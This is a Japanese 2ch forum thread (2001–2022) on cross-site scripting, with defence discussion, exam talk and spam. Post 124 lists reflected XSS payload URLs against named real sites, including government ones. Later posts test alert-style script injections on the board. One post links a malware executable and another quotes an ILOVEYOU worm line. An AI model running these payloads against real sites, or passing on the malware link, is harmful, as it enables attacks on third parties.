クロスサイトスクリプティング
- 1 :名無しさん@お腹いっぱい。:01/10/27 14:33.net
- http://securit.etl.go.jp/research/paper/css2001-takagi-dist.pdf
案外対策取られてないものですね。
クライアントサイドからもサーバサイドからも両面で対策しないと
まずいですね。
皆さんはどんな対策とってますか?
- 94 :名無しさん@お腹いっぱい。:03/10/19 22:37.net
- >>93
Webブラウザからのリクエストに対してWebサーバが返すWebコンテンツ中に
[ b ]が存在した場合には,それらに対するエスケープ処理をWebサーバが
実施しなければならないといったことがあります。
bに相当するのは普通「スクリプト」だと思うんだが、解答群に無かったよな。
- 95 :名無しさん@お腹いっぱい。:03/10/19 23:44.net
- >>94
メタキャラクタでいいんじゃない?
要は不等号をタグとして扱わなければいい訳だし。
- 96 :95:03/10/20 07:16.net
- >>95
うん。漏れもメタキャラクタにしたんだけどXSS対策に限定すると
何か回答としてはイマイチだなぁと。
- 97 :名無しさん@お腹いっぱい。:03/10/27 21:29.net
- 総務省お抱えのcrowechizekはFlash,HTML両バージョンともダメダメ。
Flashでは応答返ってこないし、HTMLでは文字大きくなるし。
"<H1>No medicine can cure a fool</H1>
- 98 :名無しさん@お腹いっぱい。:03/10/28 22:43.net
- ↑IIS?
- 99 :名無しさん@お腹いっぱい。:03/10/30 10:56.net
- > Webブラウザからのリクエストに対してWebサーバが返すWebコンテンツ中に
リクエストに対して返すコンテンツ中のメタキャラクタを全部エスケープしち
まったら、HTMLが全部ソースで見えちまうだろ。大丈夫か、その試験。
- 100 :名無しさん@お腹いっぱい。:03/10/30 11:00.net
- >>94
スクリプト を エスケープする とは言わない。
エスケープする対象として日本語的に適切な選択肢を選べば回答できる。
他にはどんな選択肢があったの?
- 101 :名無しさん@お腹いっぱい。:04/01/07 12:29.net
- 最近話題にもならなくなったな
- 102 :名無しさん@お腹いっぱい。:04/02/04 00:16.net
- クッキーで個人情報を保存するのはどう?
↓使ってみようかと思ってますが大丈夫でしょうか
ttp://resume.meieki.com/
- 103 :名無しさん@お腹いっぱい。:04/02/04 00:32.net
- URLにスクリプト仕込むのはTHEBBSの人たちが既にやってる
http://hack.dot.thebbs.jp/1068805016.html
JavascriptをいったんString.fromCharCode化してしまえば
全タグ有効っつーかなんでもできるらしい
- 104 :名無しさん@お腹いっぱい。:04/04/11 21:36.net
- ぱおぱおクッキー
- 105 :名無しさん@お腹いっぱい。:04/04/11 23:30.net
- 2chにもクロスサイトスクリプティング脆弱性は結構あるよ。
- 106 :名無しさん@お腹いっぱい。:04/04/12 08:53.net
- 言うだけなら誰でも出来る罠
- 107 :名無しさん@お腹いっぱい。:04/04/12 11:29.net
- >>106
実際にやるとどこかのおバカさんみたいに
ムショに連行される罠w
- 108 :名無しさん@お腹いっぱい。:04/04/12 13:29.net
- と言い訳をして具体例も挙げられない馬鹿もいるようで。
- 109 :名無しさん@お腹いっぱい。:04/05/09 23:56.net
- >>107
俺はハッカーだから鯖落としたりできるぜ! でも捕まるからやらない
ってな。捕まらないようにできない奴は単なる厨房
足跡ベタベタ残してならF5押してる馬鹿と同じ
- 110 :名無しさん@お腹いっぱい。:04/08/08 21:34.net
- 最近落ち着いた?
- 111 :名無しさん@お腹いっぱい。:04/09/16 16:51:06.net
- みたいだね
- 112 :名無しさん@お腹いっぱい。:04/10/18 10:27:10.net
- 懐かしいね
- 113 :名無しさん@お腹いっぱい。:04/11/19 17:45:06.net
- 想定される被害で考えたらXSSは「だからなに?」って程度のもんだよ。
Phishingに使われちゃうとかだろうな、今だと。
あとあれか、「XSSほっといてるってコトは他にも穴がバンバンあるだろうーな」
「この会社はセキュリティ対策してねーな」って思われちゃう位だろうか。
- 114 :名無しさん@お腹いっぱい。:05/01/02 11:52:43.net
-
- 115 :名無しさん@お腹いっぱい。:2005/05/19(木) 16:29:50 .net
- 質問させてください。
クロスサイトスクリプティングに関して、概要や対策を紹介したページは多々あるんですが、
実際自分のWEBサイトが攻撃の踏み台にされたかどうかの確認する方法ってあるんでしょうか?
つまりWEBサイト上に形跡が残るものかどうかということを知りたいです。
- 116 :名無しさん@お腹いっぱい。:2005/07/08(金) 16:40:25 .net
- あっそ
- 117 :名無しさん@お腹いっぱい。:2005/07/24(日) 15:08:01 .net
- ネクラヒッキーのみんなー
夏は出会いの季節!夏を盛り上げる為にも、ココで女の子と出会って仲良くなろう♪
http://www.pretty-love.com/de.php
- 118 :名無しさん@お腹いっぱい。:2005/08/03(水) 00:00:59 .net
- ●..●...●●...●●●●...●●.....●.●●.●..●.●●●....●●●...●.●.●●
ウイルス対策ソフトの検出力結果
http://www.geocities.jp/stealrush/security.html
●●..●..●●.●●....●.●●.●.●●●●●..●.●●●...●..●●.●....●●
- 119 :名無しさん@お腹いっぱい。:2006/06/03(土) 15:48:50 .net
- 先日、中国人らしいハッカーにVNCの脆弱性をりようされ
PCに進入を許してしまいました。
これは、ハッカーがIEの履歴に残していったEXEなんですが
http://mysky.6600.org/yx/gz.exe
偉い方、なにをするものか教えてください
- 120 :名無しさん@お腹いっぱい。:2007/04/05(木) 16:35:01 .net
- ttp://hyocom.jp/b_search.php
ここのキーワード検索は、XSSなんでしょうか?
- 121 :名無しさん@お腹いっぱい。:2007/11/04(日) 11:30:26 .net
- ttp://www.brooks.co.jp/index.php
ヤバイなこのサイト・・・
- 122 :名無しさん@お腹いっぱい。:2008/06/03(火) 21:25:27 .net
- >>119
メール送信ワームが作成する圧縮ユーティリティ
ワームが自分自身を圧縮してKellyOsbourne.com.gzという
ファイルを作るためのもの。
早い話がワームがすでに実行されたことを意味するよ。
- 123 :名無しさん@お腹いっぱい。:2008/06/05(木) 00:12:08 .net
- 2年物の自演てすごいよな
- 124 :名無しさん@お腹いっぱい。:2009/04/05(日) 21:36:40 .net
-
ttp://poke.ula.cc/pcview.cgi/%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
ttp://h.ula.cc/dance/?kenken=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
ttp://same.ula.cc/test/r.so/%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
ttp://unkar.jp/2ch/search.php?q=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3C%2Fscript%3E
ttp://mail-cafe.tv/p/top/index2.php?c=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://idol.mp3torrent.org/%22%3E%3Ciframe%20src=/%3E%3C/iframe%3E/index.html
ttp://www.nikkanberita.com/search.cgi?w=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
ttp://sousuo.gov.cn/pagephoto?photopage=cn%2Fphoto.jsp&channelid=3001&searchword=YouTube&url=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://sbj.saic.gov.cn/english/show.asp?id=460&bm=%27%3E%3Ciframe%3E
ttp://www.stats.gov.cn/was40/reldetail.jsp?docid=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://japanese.joins.com/search/japanese.php?query=kim%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://world.kbs.co.kr/english/news/news_Po_detail.htm?No=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://joongangdaily.joins.com/search/index.html?query=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://chinese.joins.com/gb/series.do?method=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://chinese.joins.com/big5/article.do?method=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://photo.english.chosun.com/dailyNews/view.do?category=2&gubun=ENG?gubun=daily_news_item&idx=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://news.chosun.com/svc/list_in/list.html?catid=%22%3E%3Ciframe%3E%3C/iframe%3E
- 125 :名無しさん@お腹いっぱい。:2009/06/12(金) 03:34:55 .net
- http://pc11.2ch.net/test/read.cgi/sec/1004160822/l50
- 126 :名無しさん@お腹いっぱい。:2009/06/12(金) 03:35:14 .net
- http://pc11.2ch.net/test/read.cgi/sec/1004160822/l50
- 127 :名無しさん@お腹いっぱい。:2010/09/05(日) 10:10:20 .net
- うーん
- 128 :名無しさん@お腹いっぱい。:2011/01/10(月) 14:03:21 .net
- C.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.VBS")
- 129 : 忍法帖【Lv=40,xxxPT】(5+0:8) 【29.4m】 電脳プリオン ◆3YKmpu7JR7Ic :2013/01/09(水) 22:34:04.13 ?PLT(12079).net
- ∧_∧
( ・∀・) | | ガッ
と ) | |
Y /ノ 人
/ ) < >__Λ∩
_/し' //. V`Д´)/ ←>>81
(_フ彡 /
- 130 : 忍法帖【Lv=3,xxxP】(1+0:8) :2013/01/11(金) 02:49:36.70 .net
- test
- 131 :名無しさん@お腹いっぱい。:2013/01/24(木) 21:26:51.65 .net
- 過疎スレがこんなところにも。
- 132 :名無しさん@お腹いっぱい。:2013/02/09(土) 00:06:11.18 .net
- タグを使えないネトゲのマイページのプロフィール欄に
外部のブログパーツのスクリプトを引っ張ってきたいのですが、
どのようにやればいいのでしょうか。
ご教示いただけますか?
ほかの人のやっているののソースを見ると、
アンカーが二重<<>>になっているだけのようなのですが
それで書き込んでもはじかれてしまいます。
しらべてみて、文字コードによるハック?ということまでたどりついたのですが
実際のやり方がわかりません。
詳しい方おしえてください。よろしくお願いします。
- 133 :名無しさん@お腹いっぱい。:2013/10/19(土) 22:46:39.70 .net
- <script>alert(1);</script>
<script>alert("a");</script>
>>javascript:alert(1)
- 134 :名無しさん@お腹いっぱい。:2013/10/19(土) 22:47:43.23 .net
- >>1javascript:alert(1)
- 135 :名無しさん@お腹いっぱい。:2013/10/19(土) 22:49:48.21 .net
- >>000
- 136 :名無しさん@お腹いっぱい。:2013/10/19(土) 22:55:12.82 .net
- onmouseover='alert(1)'
- 137 :名無しさん@お腹いっぱい。:2013/10/19(土) 22:56:16.74 .net
- onmouseover=alert(1)//
- 138 :名無しさん@お腹いっぱい。:2013/10/20(日) 06:48:52.86 .net
- " onmouseover="alert(1)
- 139 :名無しさん@お腹いっぱい。:2013/12/22(日) 01:29:23.82 .net
- test
<iframe style='display:none'><script>alert(1)</script></iframe>
- 140 :javascript:alert(8):2014/07/19(土) 22:32:41.10 .net
- '>"><hr>
- 141 :名無しさん@お腹いっぱい。:2014/09/21(日) 22:34:21.41 .net
- そりゃそうだ
- 142 :名無しさん@お腹いっぱい。:2015/12/16(水) 15:51:32.92 .net
- ftp%3A//
- 143 :名無しさん@お腹いっぱい。:2022/09/10(土) 10:00:49.67 ID:P49LwsCxU
- 観光(笑)は産業て゛はなく、共有財産である地球を破壞して気侯変動させて災害連発させて私腹を肥やす強盜殺人と同類なわけた゛が.
この羞恥心の欠片もない物乞い乞食と゛もが生きなか゛らえる唯─の手段は、
JALた゛のÅΝÅだのクソアイ又ト゛ゥた゛のクサイマ━クた゛のコ゛キブリフライヤーた゛のテロリス ├に敵対して.
土砂崩れに洪水,暴風.猛暑.大雪にと気候変動による被害を受けた連中とともにコ口ナ被害含めて集団損害賠償請求訴訟することだろ
航空機を使わない程度の旅行ならこれた゛け自然様もフ゛チキ゛レることもないだろうに、
都心まで数珠つなぎて゛騷音にコロナに温室効果ガスにとまき散らして国土破壊して住民を殺しながら私腹を肥やしていやがるし.
クソ航空機は国土と經済を破壞して國民の知能まて゛低下させて益々後進國にするだけのテ囗兵器た゛といい加減、氣づけや腐敗の権化自民公明
創価学會員は、何百万人も殺傷して損害を与えて私腹を肥やし続けて逮捕者まて゛出てる世界最悪の殺人腐敗組織公明党を
池田センセ―か゛囗をきけて容認するとか本氣で思ってるとしたら侮辱にもほどか゛あるぞ!
hтTPs://i.imgur.cоm/hnli1ga.jpeg
35 KB
新着レスの表示
掲示板に戻る
全部
前100
次100
最新50
read.cgi ver 2014.07.20.01.SC 2014/07/20 D ★